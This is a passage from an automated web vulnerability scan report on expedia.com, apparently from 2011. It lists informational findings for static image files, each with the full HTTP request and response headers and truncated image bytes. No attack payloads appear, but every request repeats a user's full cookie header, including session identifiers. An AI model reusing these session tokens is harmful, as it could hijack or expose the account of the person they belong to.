User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"448-1306934873248"
Last-Modified: Wed, 01 Jun 2011 13:27:53 GMT
Content-Length: 448
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89a:..............'.....
..........._..r..9..L....._..L..9..s........    ..r..8..K..8..K..`..&..s.....`......!.......,....:......` .di.h..@..p,.t.@.Kz/....'..
?!...-.8C.@.R..t;.^#[..J.^..[.0.p..6...
...[SNIP]...

10.3. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/icn_quote_beak_down.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_down.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1185-1306934923821"
Last-Modified: Wed, 01 Jun 2011 13:28:43 GMT
Content-Length: 1185
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...

10.4. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/icn_quote_beak_up.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_up.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1182-1306934928887"
Last-Modified: Wed, 01 Jun 2011 13:28:48 GMT
Content-Length: 1182
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...

10.5. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rating_bar.gif

Request

GET /static/default/default/images/infosite/rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1348-1306934969334"
Last-Modified: Wed, 01 Jun 2011 13:29:29 GMT
Content-Length: 1348
Date: Mon, 13 Jun 2011 11:21:53 GMT
Connection: close

GIF89ab........9..L.._.._..r..L...........
..'...............!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61
...[SNIP]...

10.6. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/videoPlayLarge.gif

Request

GET /static/default/default/images/infosite/videoPlayLarge.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1306934815898"
Last-Modified: Wed, 01 Jun 2011 13:26:55 GMT
Content-Length: 1275
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...

10.7. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/buttonBG.png

Request

GET /static/fusion/v2.3/images/buttonBG.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1636-1306934901311"
Last-Modified: Wed, 01 Jun 2011 13:28:21 GMT
Content-Length: 1636
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...,...S.............tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

10.8. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

Request

GET /static/fusion/v2.3/images/container/module-borders-sprite-alpha.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"3834-1306934880566"
Last-Modified: Wed, 01 Jun 2011 13:28:00 GMT
Content-Length: 3834
Date: Mon, 13 Jun 2011 11:20:35 GMT
Connection: close

.PNG
.
...IHDR..............q.~....gAMA......a.....PLTE...333.5]......................................................................................................................................
...[SNIP]...

10.9. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/iconsSprites.png

Request

GET /static/fusion/v2.3/images/iconsSprites.png HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSRT1=yvL1TQE; SSLB=1; iEAPID=000,; JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; s1=`0; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|112321680|||||||||MCI|20110713|; aspp=v.1,0|112321680|||||||||MCI|20110713|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"10346-1306932030475"
Last-Modified: Wed, 01 Jun 2011 12:40:30 GMT
Content-Length: 10346
Date: Mon, 13 Jun 2011 11:21:52 GMT
Connection: close

.PNG
.
...IHDR...i..........wYA....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

Report generated by XSS.CX at Mon Jun 13 08:00:35 CDT 2011.